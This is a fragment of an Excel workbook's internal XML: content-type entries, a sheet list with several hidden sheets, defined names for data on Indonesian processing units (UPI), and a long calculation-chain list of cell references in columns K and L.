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queryTables/queryTable2.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.queryTable+xml"/>
  <Override PartName="/xl/pivotTables/pivotTable2.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.pivotTable+xml"/>
  <Override PartName="/xl/queryTables/queryTable3.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.queryTable+xml"/>
  <Override PartName="/xl/pivotTables/pivotTable3.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.pivot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PH/Dropbox/14. DBSKPONLINE/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D2B5E6B8-2EF0-1249-B8CB-C08C38FF890B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="280" yWindow="500" windowWidth="26740" windowHeight="13800" xr2:uid="{F42E0243-7DE2-FB49-9F93-A474ECDFCB1C}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="realisasi per tahun" sheetId="8" state="hidden" r:id="rId2"/>
    <sheet name="Sheet2" sheetId="2" state="hidden" r:id="rId3"/>
    <sheet name="Sheet6" sheetId="6" state="hidden" r:id="rId4"/>
    <sheet name="Sheet3" sheetId="3" state="hidden" r:id="rId5"/>
    <sheet name="Sheet7" sheetId="7" state="hidden" r:id="rId6"/>
    <sheet name="Sheet5" sheetId="5" state="hidden" r:id="rId7"/>
    <sheet name="Sheet4" sheetId="4" state="hidden" r:id="rId8"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Sheet1!$A$1:$BD$1270</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">Sheet2!$A$1:$L$5081</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">Sheet3!$A$1:$C$7957</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">Sheet4!$A$1:$D$23249</definedName>
    <definedName name="upi_nib_npwp" localSheetId="4">Sheet3!$A$1:$C$7957</definedName>
    <definedName name="upi_plus_sarpras" localSheetId="0">Sheet1!$A$1:$AT$1270</definedName>
    <definedName name="upi_realisasi_pasar" localSheetId="2">Sheet2!$A$1:$J$5081</definedName>
    <definedName name="upi_tenagakerja" localSheetId="7">Sheet4!$A$1:$D$23249</definedName>
  </definedNames>
  <calcPr calcId="181029"/>
  <pivotCaches>
    <pivotCache cacheId="9" r:id="rId9"/>
    <pivotCache cacheId="12" r:id="rId10"/>
    <pivotCache cacheId="2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379" i="2" l="1"/>
  <c r="K1379" i="2"/>
  <c r="L1353" i="2"/>
  <c r="K1353" i="2"/>
  <c r="L1272" i="2"/>
  <c r="K1272" i="2"/>
  <c r="L1248" i="2"/>
  <c r="K1248" i="2"/>
  <c r="L1240" i="2"/>
  <c r="K1240" i="2"/>
  <c r="L1258" i="2"/>
  <c r="K1258" i="2"/>
  <c r="L1257" i="2"/>
  <c r="K1257" i="2"/>
  <c r="L1271" i="2"/>
  <c r="K1271" i="2"/>
  <c r="L1256" i="2"/>
  <c r="K1256" i="2"/>
  <c r="L1270" i="2"/>
  <c r="K1270" i="2"/>
  <c r="L1268" i="2"/>
  <c r="K1268" i="2"/>
  <c r="L367" i="2"/>
  <c r="K367" i="2"/>
  <c r="L1241" i="2"/>
  <c r="K1241" i="2"/>
  <c r="L1899" i="2"/>
  <c r="K1899" i="2"/>
  <c r="L1392" i="2"/>
  <c r="K1392" i="2"/>
  <c r="L1391" i="2"/>
  <c r="K1391" i="2"/>
  <c r="L744" i="2"/>
  <c r="K744" i="2"/>
  <c r="L1518" i="2"/>
  <c r="K1518" i="2"/>
  <c r="L1048" i="2"/>
  <c r="K1048" i="2"/>
  <c r="L1096" i="2"/>
  <c r="K1096" i="2"/>
  <c r="L700" i="2"/>
  <c r="K700" i="2"/>
  <c r="L1459" i="2"/>
  <c r="K1459" i="2"/>
  <c r="L878" i="2"/>
  <c r="K878" i="2"/>
  <c r="L991" i="2"/>
  <c r="K991" i="2"/>
  <c r="L365" i="2"/>
  <c r="K365" i="2"/>
  <c r="L364" i="2"/>
  <c r="K364" i="2"/>
  <c r="L435" i="2"/>
  <c r="K435" i="2"/>
  <c r="L363" i="2"/>
  <c r="K363" i="2"/>
  <c r="L362" i="2"/>
  <c r="K362" i="2"/>
  <c r="L113" i="2"/>
  <c r="K113" i="2"/>
  <c r="L104" i="2"/>
  <c r="K104" i="2"/>
  <c r="L345" i="2"/>
  <c r="K345" i="2"/>
  <c r="L1095" i="2"/>
  <c r="K1095" i="2"/>
  <c r="L911" i="2"/>
  <c r="K911" i="2"/>
  <c r="L180" i="2"/>
  <c r="K180" i="2"/>
  <c r="L1898" i="2"/>
  <c r="K1898" i="2"/>
  <c r="L302" i="2"/>
  <c r="K302" i="2"/>
  <c r="L301" i="2"/>
  <c r="K301" i="2"/>
  <c r="L300" i="2"/>
  <c r="K300" i="2"/>
  <c r="L299" i="2"/>
  <c r="K299" i="2"/>
  <c r="L298" i="2"/>
  <c r="K298" i="2"/>
  <c r="L297" i="2"/>
  <c r="K297" i="2"/>
  <c r="L296" i="2"/>
  <c r="K296" i="2"/>
  <c r="L295" i="2"/>
  <c r="K295" i="2"/>
  <c r="L294" i="2"/>
  <c r="K294" i="2"/>
  <c r="L1381" i="2"/>
  <c r="K1381" i="2"/>
  <c r="L1387" i="2"/>
  <c r="K1387" i="2"/>
  <c r="L1517" i="2"/>
  <c r="K1517" i="2"/>
  <c r="L361" i="2"/>
  <c r="K361" i="2"/>
  <c r="L1426" i="2"/>
  <c r="K1426" i="2"/>
  <c r="L183" i="2"/>
  <c r="K183" i="2"/>
  <c r="L1516" i="2"/>
  <c r="K1516" i="2"/>
  <c r="L209" i="2"/>
  <c r="K209" i="2"/>
  <c r="L1515" i="2"/>
  <c r="K1515" i="2"/>
  <c r="L348" i="2"/>
  <c r="K348" i="2"/>
  <c r="L899" i="2"/>
  <c r="K899" i="2"/>
  <c r="L369" i="2"/>
  <c r="K369" i="2"/>
  <c r="L446" i="2"/>
  <c r="K446" i="2"/>
  <c r="L478" i="2"/>
  <c r="K478" i="2"/>
  <c r="L1261" i="2"/>
  <c r="K1261" i="2"/>
  <c r="L1239" i="2"/>
  <c r="K1239" i="2"/>
  <c r="L285" i="2"/>
  <c r="K285" i="2"/>
  <c r="L284" i="2"/>
  <c r="K284" i="2"/>
  <c r="L283" i="2"/>
  <c r="K283" i="2"/>
  <c r="L982" i="2"/>
  <c r="K982" i="2"/>
  <c r="L981" i="2"/>
  <c r="K981" i="2"/>
  <c r="L303" i="2"/>
  <c r="K303" i="2"/>
  <c r="L257" i="2"/>
  <c r="K257" i="2"/>
  <c r="L229" i="2"/>
  <c r="K229" i="2"/>
  <c r="L10" i="2"/>
  <c r="K10" i="2"/>
  <c r="L1094" i="2"/>
  <c r="K1094" i="2"/>
  <c r="L1093" i="2"/>
  <c r="K1093" i="2"/>
  <c r="L1092" i="2"/>
  <c r="K1092" i="2"/>
  <c r="L445" i="2"/>
  <c r="K445" i="2"/>
  <c r="L1216" i="2"/>
  <c r="K1216" i="2"/>
  <c r="L914" i="2"/>
  <c r="K914" i="2"/>
  <c r="L47" i="2"/>
  <c r="K47" i="2"/>
  <c r="L174" i="2"/>
  <c r="K174" i="2"/>
  <c r="L526" i="2"/>
  <c r="K526" i="2"/>
  <c r="L554" i="2"/>
  <c r="K554" i="2"/>
  <c r="L530" i="2"/>
  <c r="K530" i="2"/>
  <c r="L529" i="2"/>
  <c r="K529" i="2"/>
  <c r="L528" i="2"/>
  <c r="K528" i="2"/>
  <c r="L527" i="2"/>
  <c r="K527" i="2"/>
  <c r="L1897" i="2"/>
  <c r="K1897" i="2"/>
  <c r="L553" i="2"/>
  <c r="K553" i="2"/>
  <c r="L1896" i="2"/>
  <c r="K1896" i="2"/>
  <c r="L552" i="2"/>
  <c r="K552" i="2"/>
  <c r="L551" i="2"/>
  <c r="K551" i="2"/>
  <c r="L383" i="2"/>
  <c r="K383" i="2"/>
  <c r="L256" i="2"/>
  <c r="K256" i="2"/>
  <c r="L550" i="2"/>
  <c r="K550" i="2"/>
  <c r="L407" i="2"/>
  <c r="K407" i="2"/>
  <c r="L406" i="2"/>
  <c r="K406" i="2"/>
  <c r="L116" i="2"/>
  <c r="K116" i="2"/>
  <c r="L654" i="2"/>
  <c r="K654"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895" i="2"/>
  <c r="K1895" i="2"/>
  <c r="L1316" i="2"/>
  <c r="K1316" i="2"/>
  <c r="L1315" i="2"/>
  <c r="K1315" i="2"/>
  <c r="L217" i="2"/>
  <c r="K217" i="2"/>
  <c r="L216" i="2"/>
  <c r="K216" i="2"/>
  <c r="L656" i="2"/>
  <c r="K656" i="2"/>
  <c r="L655" i="2"/>
  <c r="K655" i="2"/>
  <c r="L477" i="2"/>
  <c r="K477" i="2"/>
  <c r="L366" i="2"/>
  <c r="K366" i="2"/>
  <c r="L360" i="2"/>
  <c r="K360" i="2"/>
  <c r="L59" i="2"/>
  <c r="K59" i="2"/>
  <c r="L58" i="2"/>
  <c r="K58" i="2"/>
  <c r="L1044" i="2"/>
  <c r="K1044" i="2"/>
  <c r="L792" i="2"/>
  <c r="K792" i="2"/>
  <c r="L1413" i="2"/>
  <c r="K1413" i="2"/>
  <c r="L714" i="2"/>
  <c r="K714" i="2"/>
  <c r="L713" i="2"/>
  <c r="K713" i="2"/>
  <c r="L592" i="2"/>
  <c r="K592" i="2"/>
  <c r="L354" i="2"/>
  <c r="K354" i="2"/>
  <c r="L1336" i="2"/>
  <c r="K1336" i="2"/>
  <c r="L1236" i="2"/>
  <c r="K1236" i="2"/>
  <c r="L1242" i="2"/>
  <c r="K1242" i="2"/>
  <c r="L398" i="2"/>
  <c r="K398" i="2"/>
  <c r="L426" i="2"/>
  <c r="K426" i="2"/>
  <c r="L1346" i="2"/>
  <c r="K1346" i="2"/>
  <c r="L1266" i="2"/>
  <c r="K1266" i="2"/>
  <c r="L1262" i="2"/>
  <c r="K1262" i="2"/>
  <c r="L444" i="2"/>
  <c r="K444" i="2"/>
  <c r="L1894" i="2"/>
  <c r="K1894" i="2"/>
  <c r="L1893" i="2"/>
  <c r="K1893" i="2"/>
  <c r="L1892" i="2"/>
  <c r="K1892" i="2"/>
  <c r="L1374" i="2"/>
  <c r="K1374" i="2"/>
  <c r="L1373" i="2"/>
  <c r="K1373" i="2"/>
  <c r="L1372" i="2"/>
  <c r="K1372" i="2"/>
  <c r="L1371" i="2"/>
  <c r="K1371" i="2"/>
  <c r="L1370" i="2"/>
  <c r="K1370" i="2"/>
  <c r="L1891" i="2"/>
  <c r="K1891"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060" i="2"/>
  <c r="K1060" i="2"/>
  <c r="L1059" i="2"/>
  <c r="K1059" i="2"/>
  <c r="L1058" i="2"/>
  <c r="K1058" i="2"/>
  <c r="L1057" i="2"/>
  <c r="K1057" i="2"/>
  <c r="L425" i="2"/>
  <c r="K425" i="2"/>
  <c r="L1215" i="2"/>
  <c r="K1215" i="2"/>
  <c r="L1451" i="2"/>
  <c r="K1451" i="2"/>
  <c r="L1457" i="2"/>
  <c r="K1457" i="2"/>
  <c r="L1243" i="2"/>
  <c r="K1243" i="2"/>
  <c r="L179" i="2"/>
  <c r="K179" i="2"/>
  <c r="L178" i="2"/>
  <c r="K178" i="2"/>
  <c r="L177" i="2"/>
  <c r="K177" i="2"/>
  <c r="L176" i="2"/>
  <c r="K176" i="2"/>
  <c r="L649" i="2"/>
  <c r="K649" i="2"/>
  <c r="L1450" i="2"/>
  <c r="K1450" i="2"/>
  <c r="L1449" i="2"/>
  <c r="K1449" i="2"/>
  <c r="L1448" i="2"/>
  <c r="K1448" i="2"/>
  <c r="L1447" i="2"/>
  <c r="K1447" i="2"/>
  <c r="L791" i="2"/>
  <c r="K791" i="2"/>
  <c r="L794" i="2"/>
  <c r="K794" i="2"/>
  <c r="L793" i="2"/>
  <c r="K793" i="2"/>
  <c r="L1446" i="2"/>
  <c r="K1446" i="2"/>
  <c r="L1041" i="2"/>
  <c r="K1041" i="2"/>
  <c r="L980" i="2"/>
  <c r="K980" i="2"/>
  <c r="L877" i="2"/>
  <c r="K877" i="2"/>
  <c r="L929" i="2"/>
  <c r="K929" i="2"/>
  <c r="L680" i="2"/>
  <c r="K680" i="2"/>
  <c r="L1890" i="2"/>
  <c r="K1890" i="2"/>
  <c r="L549" i="2"/>
  <c r="K549" i="2"/>
  <c r="L1214" i="2"/>
  <c r="K1214" i="2"/>
  <c r="L898" i="2"/>
  <c r="K898" i="2"/>
  <c r="L1213" i="2"/>
  <c r="K1213" i="2"/>
  <c r="L979" i="2"/>
  <c r="K979" i="2"/>
  <c r="L1212" i="2"/>
  <c r="K1212" i="2"/>
  <c r="L978" i="2"/>
  <c r="K978" i="2"/>
  <c r="L977" i="2"/>
  <c r="K977" i="2"/>
  <c r="L976" i="2"/>
  <c r="K976" i="2"/>
  <c r="L975" i="2"/>
  <c r="K975" i="2"/>
  <c r="L974" i="2"/>
  <c r="K974" i="2"/>
  <c r="L973" i="2"/>
  <c r="K973" i="2"/>
  <c r="L1211" i="2"/>
  <c r="K1211" i="2"/>
  <c r="L1210" i="2"/>
  <c r="K1210" i="2"/>
  <c r="L148" i="2"/>
  <c r="K148" i="2"/>
  <c r="L232" i="2"/>
  <c r="K232" i="2"/>
  <c r="L293" i="2"/>
  <c r="K293" i="2"/>
  <c r="L1091" i="2"/>
  <c r="K1091" i="2"/>
  <c r="L928" i="2"/>
  <c r="K928" i="2"/>
  <c r="L1101" i="2"/>
  <c r="K1101" i="2"/>
  <c r="L501" i="2"/>
  <c r="K501" i="2"/>
  <c r="L162" i="2"/>
  <c r="K162" i="2"/>
  <c r="L507" i="2"/>
  <c r="K507" i="2"/>
  <c r="L506" i="2"/>
  <c r="K506" i="2"/>
  <c r="L505" i="2"/>
  <c r="K505" i="2"/>
  <c r="L504" i="2"/>
  <c r="K504" i="2"/>
  <c r="L509" i="2"/>
  <c r="K509" i="2"/>
  <c r="L687" i="2"/>
  <c r="K687" i="2"/>
  <c r="L1279" i="2"/>
  <c r="K1279" i="2"/>
  <c r="L314" i="2"/>
  <c r="K314" i="2"/>
  <c r="L313" i="2"/>
  <c r="K313" i="2"/>
  <c r="L195" i="2"/>
  <c r="K195" i="2"/>
  <c r="L604" i="2"/>
  <c r="K604" i="2"/>
  <c r="L603" i="2"/>
  <c r="K603" i="2"/>
  <c r="L233" i="2"/>
  <c r="K233" i="2"/>
  <c r="L617" i="2"/>
  <c r="K617" i="2"/>
  <c r="L548" i="2"/>
  <c r="K548" i="2"/>
  <c r="L1035" i="2"/>
  <c r="K1035" i="2"/>
  <c r="L1341" i="2"/>
  <c r="K1341" i="2"/>
  <c r="L1340" i="2"/>
  <c r="K1340" i="2"/>
  <c r="L996" i="2"/>
  <c r="K996" i="2"/>
  <c r="L995" i="2"/>
  <c r="K995" i="2"/>
  <c r="L994" i="2"/>
  <c r="K994" i="2"/>
  <c r="L993" i="2"/>
  <c r="K993" i="2"/>
  <c r="L312" i="2"/>
  <c r="K312" i="2"/>
  <c r="L311" i="2"/>
  <c r="K311" i="2"/>
  <c r="L310" i="2"/>
  <c r="K310" i="2"/>
  <c r="L31" i="2"/>
  <c r="K31" i="2"/>
  <c r="L30" i="2"/>
  <c r="K30" i="2"/>
  <c r="L29" i="2"/>
  <c r="K29" i="2"/>
  <c r="L28" i="2"/>
  <c r="K28" i="2"/>
  <c r="L27" i="2"/>
  <c r="K27" i="2"/>
  <c r="L26" i="2"/>
  <c r="K26" i="2"/>
  <c r="L46" i="2"/>
  <c r="K46" i="2"/>
  <c r="L25" i="2"/>
  <c r="K25" i="2"/>
  <c r="L972" i="2"/>
  <c r="K972" i="2"/>
  <c r="L1345" i="2"/>
  <c r="K1345" i="2"/>
  <c r="L1344" i="2"/>
  <c r="K1344" i="2"/>
  <c r="L1343" i="2"/>
  <c r="K1343" i="2"/>
  <c r="L971" i="2"/>
  <c r="K971" i="2"/>
  <c r="L970" i="2"/>
  <c r="K970" i="2"/>
  <c r="L1465" i="2"/>
  <c r="K1465" i="2"/>
  <c r="L927" i="2"/>
  <c r="K927" i="2"/>
  <c r="L745" i="2"/>
  <c r="K745" i="2"/>
  <c r="L1445" i="2"/>
  <c r="K1445" i="2"/>
  <c r="L1514" i="2"/>
  <c r="K1514" i="2"/>
  <c r="L1209" i="2"/>
  <c r="K1209" i="2"/>
  <c r="L876" i="2"/>
  <c r="K876" i="2"/>
  <c r="L1100" i="2"/>
  <c r="K1100" i="2"/>
  <c r="L1352" i="2"/>
  <c r="K1352" i="2"/>
  <c r="L1351" i="2"/>
  <c r="K1351" i="2"/>
  <c r="L1412" i="2"/>
  <c r="K1412" i="2"/>
  <c r="L788" i="2"/>
  <c r="K788" i="2"/>
  <c r="L679" i="2"/>
  <c r="K679" i="2"/>
  <c r="L476" i="2"/>
  <c r="K476" i="2"/>
  <c r="L475" i="2"/>
  <c r="K475" i="2"/>
  <c r="L474" i="2"/>
  <c r="K474" i="2"/>
  <c r="L473" i="2"/>
  <c r="K473" i="2"/>
  <c r="L472" i="2"/>
  <c r="K472" i="2"/>
  <c r="L471" i="2"/>
  <c r="K471" i="2"/>
  <c r="L470" i="2"/>
  <c r="K470" i="2"/>
  <c r="L469" i="2"/>
  <c r="K469" i="2"/>
  <c r="L468" i="2"/>
  <c r="K468" i="2"/>
  <c r="L875" i="2"/>
  <c r="K875" i="2"/>
  <c r="L593" i="2"/>
  <c r="K593" i="2"/>
  <c r="L743" i="2"/>
  <c r="K743" i="2"/>
  <c r="L742" i="2"/>
  <c r="K742" i="2"/>
  <c r="L710" i="2"/>
  <c r="K710" i="2"/>
  <c r="L1513" i="2"/>
  <c r="K1513" i="2"/>
  <c r="L1512" i="2"/>
  <c r="K1512" i="2"/>
  <c r="L1511" i="2"/>
  <c r="K1511" i="2"/>
  <c r="L443" i="2"/>
  <c r="K443" i="2"/>
  <c r="L1208" i="2"/>
  <c r="K1208" i="2"/>
  <c r="L1207" i="2"/>
  <c r="K1207" i="2"/>
  <c r="L1206" i="2"/>
  <c r="K1206" i="2"/>
  <c r="L273" i="2"/>
  <c r="K273" i="2"/>
  <c r="L272" i="2"/>
  <c r="K272" i="2"/>
  <c r="L271" i="2"/>
  <c r="K271" i="2"/>
  <c r="L270" i="2"/>
  <c r="K270" i="2"/>
  <c r="L269" i="2"/>
  <c r="K269" i="2"/>
  <c r="L268" i="2"/>
  <c r="K268" i="2"/>
  <c r="L267" i="2"/>
  <c r="K267" i="2"/>
  <c r="L165" i="2"/>
  <c r="K165" i="2"/>
  <c r="L212" i="2"/>
  <c r="K212" i="2"/>
  <c r="L164" i="2"/>
  <c r="K164" i="2"/>
  <c r="L163" i="2"/>
  <c r="K163" i="2"/>
  <c r="L378" i="2"/>
  <c r="K378" i="2"/>
  <c r="L292" i="2"/>
  <c r="K292" i="2"/>
  <c r="L1444" i="2"/>
  <c r="K1444" i="2"/>
  <c r="L1443" i="2"/>
  <c r="K1443" i="2"/>
  <c r="L1442" i="2"/>
  <c r="K1442" i="2"/>
  <c r="L1441" i="2"/>
  <c r="K1441" i="2"/>
  <c r="L874" i="2"/>
  <c r="K874" i="2"/>
  <c r="L873" i="2"/>
  <c r="K873" i="2"/>
  <c r="L291" i="2"/>
  <c r="K291" i="2"/>
  <c r="L290" i="2"/>
  <c r="K290" i="2"/>
  <c r="L377" i="2"/>
  <c r="K377" i="2"/>
  <c r="L467" i="2"/>
  <c r="K467" i="2"/>
  <c r="L376" i="2"/>
  <c r="K376" i="2"/>
  <c r="L466" i="2"/>
  <c r="K466" i="2"/>
  <c r="L465" i="2"/>
  <c r="K465" i="2"/>
  <c r="L289" i="2"/>
  <c r="K289" i="2"/>
  <c r="L464" i="2"/>
  <c r="K464" i="2"/>
  <c r="L172" i="2"/>
  <c r="K172" i="2"/>
  <c r="L463" i="2"/>
  <c r="K463" i="2"/>
  <c r="L375" i="2"/>
  <c r="K375" i="2"/>
  <c r="L634" i="2"/>
  <c r="K634" i="2"/>
  <c r="L754" i="2"/>
  <c r="K754" i="2"/>
  <c r="L753" i="2"/>
  <c r="K753" i="2"/>
  <c r="L752" i="2"/>
  <c r="K752" i="2"/>
  <c r="L248" i="2"/>
  <c r="K248" i="2"/>
  <c r="L247" i="2"/>
  <c r="K247" i="2"/>
  <c r="L255" i="2"/>
  <c r="K255" i="2"/>
  <c r="L254" i="2"/>
  <c r="K254" i="2"/>
  <c r="L638" i="2"/>
  <c r="K638" i="2"/>
  <c r="L214" i="2"/>
  <c r="K214" i="2"/>
  <c r="L353" i="2"/>
  <c r="K353" i="2"/>
  <c r="L352" i="2"/>
  <c r="K352" i="2"/>
  <c r="L359" i="2"/>
  <c r="K359" i="2"/>
  <c r="L351" i="2"/>
  <c r="K351" i="2"/>
  <c r="L358" i="2"/>
  <c r="K358" i="2"/>
  <c r="L741" i="2"/>
  <c r="K741" i="2"/>
  <c r="L712" i="2"/>
  <c r="K712" i="2"/>
  <c r="L663" i="2"/>
  <c r="K663" i="2"/>
  <c r="L1383" i="2"/>
  <c r="K1383" i="2"/>
  <c r="L1382" i="2"/>
  <c r="K1382" i="2"/>
  <c r="L1205" i="2"/>
  <c r="K1205" i="2"/>
  <c r="L1051" i="2"/>
  <c r="K1051" i="2"/>
  <c r="L1046" i="2"/>
  <c r="K1046" i="2"/>
  <c r="L1049" i="2"/>
  <c r="K1049" i="2"/>
  <c r="L1090" i="2"/>
  <c r="K1090" i="2"/>
  <c r="L749" i="2"/>
  <c r="K749" i="2"/>
  <c r="L748" i="2"/>
  <c r="K748" i="2"/>
  <c r="L740" i="2"/>
  <c r="K740" i="2"/>
  <c r="L826" i="2"/>
  <c r="K826" i="2"/>
  <c r="L872" i="2"/>
  <c r="K872" i="2"/>
  <c r="L1034" i="2"/>
  <c r="K1034" i="2"/>
  <c r="L557" i="2"/>
  <c r="K557" i="2"/>
  <c r="L490" i="2"/>
  <c r="K490" i="2"/>
  <c r="L648" i="2"/>
  <c r="K648" i="2"/>
  <c r="L747" i="2"/>
  <c r="K747" i="2"/>
  <c r="L746" i="2"/>
  <c r="K746" i="2"/>
  <c r="L1538" i="2"/>
  <c r="K1538" i="2"/>
  <c r="L1537" i="2"/>
  <c r="K1537" i="2"/>
  <c r="L1536" i="2"/>
  <c r="K1536" i="2"/>
  <c r="L372" i="2"/>
  <c r="K372" i="2"/>
  <c r="L1510" i="2"/>
  <c r="K1510" i="2"/>
  <c r="L228" i="2"/>
  <c r="K228" i="2"/>
  <c r="L227" i="2"/>
  <c r="K227" i="2"/>
  <c r="L871" i="2"/>
  <c r="K871" i="2"/>
  <c r="L870" i="2"/>
  <c r="K870" i="2"/>
  <c r="L63" i="2"/>
  <c r="K63" i="2"/>
  <c r="L62" i="2"/>
  <c r="K62" i="2"/>
  <c r="L807" i="2"/>
  <c r="K807" i="2"/>
  <c r="L806" i="2"/>
  <c r="K806" i="2"/>
  <c r="L1204" i="2"/>
  <c r="K1204" i="2"/>
  <c r="L1203" i="2"/>
  <c r="K1203" i="2"/>
  <c r="L1202" i="2"/>
  <c r="K1202" i="2"/>
  <c r="L1201" i="2"/>
  <c r="K1201" i="2"/>
  <c r="L1314" i="2"/>
  <c r="K1314" i="2"/>
  <c r="L1313" i="2"/>
  <c r="K1313" i="2"/>
  <c r="L1312" i="2"/>
  <c r="K1312" i="2"/>
  <c r="L1311" i="2"/>
  <c r="K1311" i="2"/>
  <c r="L1310" i="2"/>
  <c r="K1310" i="2"/>
  <c r="L1309" i="2"/>
  <c r="K1309" i="2"/>
  <c r="L1308" i="2"/>
  <c r="K1308" i="2"/>
  <c r="L869" i="2"/>
  <c r="K869" i="2"/>
  <c r="L357" i="2"/>
  <c r="K357" i="2"/>
  <c r="L1395" i="2"/>
  <c r="K1395" i="2"/>
  <c r="L1347" i="2"/>
  <c r="K1347" i="2"/>
  <c r="L1456" i="2"/>
  <c r="K1456" i="2"/>
  <c r="L1394" i="2"/>
  <c r="K1394" i="2"/>
  <c r="L1889" i="2"/>
  <c r="K1889" i="2"/>
  <c r="L997" i="2"/>
  <c r="K997" i="2"/>
  <c r="L985" i="2"/>
  <c r="K985" i="2"/>
  <c r="L984" i="2"/>
  <c r="K984" i="2"/>
  <c r="L825" i="2"/>
  <c r="K825" i="2"/>
  <c r="L397" i="2"/>
  <c r="K397" i="2"/>
  <c r="L396" i="2"/>
  <c r="K396" i="2"/>
  <c r="L1888" i="2"/>
  <c r="K1888" i="2"/>
  <c r="L395" i="2"/>
  <c r="K395" i="2"/>
  <c r="L394" i="2"/>
  <c r="K394" i="2"/>
  <c r="L187" i="2"/>
  <c r="K187" i="2"/>
  <c r="L147" i="2"/>
  <c r="K147" i="2"/>
  <c r="L1509" i="2"/>
  <c r="K1509" i="2"/>
  <c r="L1508" i="2"/>
  <c r="K1508" i="2"/>
  <c r="L1507" i="2"/>
  <c r="K1507" i="2"/>
  <c r="L1535" i="2"/>
  <c r="K1535" i="2"/>
  <c r="L1028" i="2"/>
  <c r="K1028" i="2"/>
  <c r="L1027" i="2"/>
  <c r="K1027" i="2"/>
  <c r="L868" i="2"/>
  <c r="K868" i="2"/>
  <c r="L867" i="2"/>
  <c r="K867" i="2"/>
  <c r="L866" i="2"/>
  <c r="K866" i="2"/>
  <c r="L865" i="2"/>
  <c r="K865" i="2"/>
  <c r="L16" i="2"/>
  <c r="K16" i="2"/>
  <c r="L20" i="2"/>
  <c r="K20" i="2"/>
  <c r="L17" i="2"/>
  <c r="K17" i="2"/>
  <c r="L48" i="2"/>
  <c r="K48" i="2"/>
  <c r="L18" i="2"/>
  <c r="K18" i="2"/>
  <c r="L309" i="2"/>
  <c r="K309" i="2"/>
  <c r="L308" i="2"/>
  <c r="K308" i="2"/>
  <c r="L223" i="2"/>
  <c r="K223" i="2"/>
  <c r="L252" i="2"/>
  <c r="K252" i="2"/>
  <c r="L240" i="2"/>
  <c r="K240" i="2"/>
  <c r="L340" i="2"/>
  <c r="K340" i="2"/>
  <c r="L834" i="2"/>
  <c r="K834" i="2"/>
  <c r="L1120" i="2"/>
  <c r="K1120" i="2"/>
  <c r="L61" i="2"/>
  <c r="K61" i="2"/>
  <c r="L1200" i="2"/>
  <c r="K1200" i="2"/>
  <c r="L809" i="2"/>
  <c r="K809" i="2"/>
  <c r="L1199" i="2"/>
  <c r="K1199" i="2"/>
  <c r="L690" i="2"/>
  <c r="K690" i="2"/>
  <c r="L321" i="2"/>
  <c r="K321" i="2"/>
  <c r="L325" i="2"/>
  <c r="K325" i="2"/>
  <c r="L97" i="2"/>
  <c r="K97" i="2"/>
  <c r="L96" i="2"/>
  <c r="K96" i="2"/>
  <c r="L95" i="2"/>
  <c r="K95" i="2"/>
  <c r="L1089" i="2"/>
  <c r="K1089" i="2"/>
  <c r="L213" i="2"/>
  <c r="K213" i="2"/>
  <c r="L676" i="2"/>
  <c r="K676" i="2"/>
  <c r="L462" i="2"/>
  <c r="K462" i="2"/>
  <c r="L461" i="2"/>
  <c r="K461" i="2"/>
  <c r="L460" i="2"/>
  <c r="K460" i="2"/>
  <c r="L1198" i="2"/>
  <c r="K1198" i="2"/>
  <c r="L1197" i="2"/>
  <c r="K1197" i="2"/>
  <c r="L1026" i="2"/>
  <c r="K1026" i="2"/>
  <c r="L1025" i="2"/>
  <c r="K1025" i="2"/>
  <c r="L1196" i="2"/>
  <c r="K1196" i="2"/>
  <c r="L864" i="2"/>
  <c r="K864" i="2"/>
  <c r="L1024" i="2"/>
  <c r="K1024" i="2"/>
  <c r="L934" i="2"/>
  <c r="K934" i="2"/>
  <c r="L1195" i="2"/>
  <c r="K1195" i="2"/>
  <c r="L389" i="2"/>
  <c r="K389" i="2"/>
  <c r="L629" i="2"/>
  <c r="K629" i="2"/>
  <c r="L628" i="2"/>
  <c r="K628" i="2"/>
  <c r="L226" i="2"/>
  <c r="K226" i="2"/>
  <c r="L50" i="2"/>
  <c r="K50" i="2"/>
  <c r="L49" i="2"/>
  <c r="K49" i="2"/>
  <c r="L627" i="2"/>
  <c r="K627" i="2"/>
  <c r="L1506" i="2"/>
  <c r="K1506" i="2"/>
  <c r="L1505" i="2"/>
  <c r="K1505" i="2"/>
  <c r="L1504" i="2"/>
  <c r="K1504" i="2"/>
  <c r="L1503" i="2"/>
  <c r="K1503" i="2"/>
  <c r="L1502" i="2"/>
  <c r="K1502" i="2"/>
  <c r="L1501" i="2"/>
  <c r="K1501" i="2"/>
  <c r="L1194" i="2"/>
  <c r="K1194" i="2"/>
  <c r="L1033" i="2"/>
  <c r="K1033" i="2"/>
  <c r="L815" i="2"/>
  <c r="K815" i="2"/>
  <c r="L1307" i="2"/>
  <c r="K1307" i="2"/>
  <c r="L1306" i="2"/>
  <c r="K1306" i="2"/>
  <c r="L98" i="2"/>
  <c r="K98" i="2"/>
  <c r="L22" i="2"/>
  <c r="K22" i="2"/>
  <c r="L1440" i="2"/>
  <c r="K1440" i="2"/>
  <c r="L739" i="2"/>
  <c r="K739" i="2"/>
  <c r="L324" i="2"/>
  <c r="K324" i="2"/>
  <c r="L60" i="2"/>
  <c r="K60" i="2"/>
  <c r="L1023" i="2"/>
  <c r="K1023" i="2"/>
  <c r="L547" i="2"/>
  <c r="K547" i="2"/>
  <c r="L1022" i="2"/>
  <c r="K1022" i="2"/>
  <c r="L783" i="2"/>
  <c r="K783" i="2"/>
  <c r="L1021" i="2"/>
  <c r="K1021" i="2"/>
  <c r="L787" i="2"/>
  <c r="K787" i="2"/>
  <c r="L356" i="2"/>
  <c r="K356" i="2"/>
  <c r="L616" i="2"/>
